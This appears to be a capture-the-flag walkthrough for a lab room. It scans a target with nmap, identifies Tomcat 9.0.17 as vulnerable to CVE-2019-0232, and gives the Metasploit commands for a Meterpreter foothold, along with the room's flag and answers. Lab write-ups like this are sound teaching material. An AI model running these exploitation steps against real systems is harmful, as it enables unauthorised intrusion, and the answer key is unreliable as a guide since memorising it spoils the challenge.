# Ready, set, elf.

## Video

{% embed url="<https://www.youtube.com/watch?v=6DOp2Fn1AsQ&feature=emb_logo>" %}

## Resources

`systeminfo`

[URL encoded](https://www.techopedia.com/definition/10346/url-encoding)

## Challenge

### What is the version number of the web server?

```
nmap -Pn -sC -sV -O -v 10.10.198.75
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONaceuqHm3hBLZ3GGY%2F-MONb4IZxoAbOFVlVeR_%2Fimage.png?alt=media\&token=cf7db7c4-1d8d-4512-b045-3956e6580f55)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONb6fs3SSRYt8QjAm-%2F-MONbMm7QA3o1Q_AUXvC%2Fimage.png?alt=media\&token=a22a844b-c58d-4b5d-a081-e9071361dcbb)

{% hint style="success" %}
9.0.17
{% endhint %}

### &#x20;What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONbzwv9WpJkYkt8YJi%2Fimage.png?alt=media\&token=a6194bc6-7bae-4646-82c9-103614af387f)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONcEBnY2e7fzKGSdUo%2Fimage.png?alt=media\&token=7f223d04-365d-4beb-8bac-6e5bd74f9637)

{% hint style="success" %}
CVE-2019-0232
{% endhint %}

### Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONl0igeRDsg1d1YMiM%2Fimage.png?alt=media\&token=d6f32dd8-f4fe-4d16-94a8-532b6c4d2150)

```
msfconsole
search 2019-0232
use exploit/windows/http/tomcat_cgi_cmdlineargs
show targets
set TARGET 0
show options
set RHOST 10.10.198.75
set targeturi /cgi-bin/elfwhacker.bat
exploit
```

{% hint style="success" %}
**`No answer needed`**
{% endhint %}

### What are the contents of flag1.txt

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONjpREYL7FFSCPtS0u%2Fimage.png?alt=media\&token=354664a8-65fc-49f3-b1e2-c98a5c380ee6)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MONbZ4pQbeUwOHq6xwD%2F-MONksnr8k2uZtMq8EeF%2Fimage.png?alt=media\&token=42d786c4-119c-438b-b3cd-ab7c81b6f9e1)

{% hint style="success" %}
thm{whacking\_all\_the\_elves}
{% endhint %}

### Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!

{% hint style="success" %}
**`No answer needed`**
{% endhint %}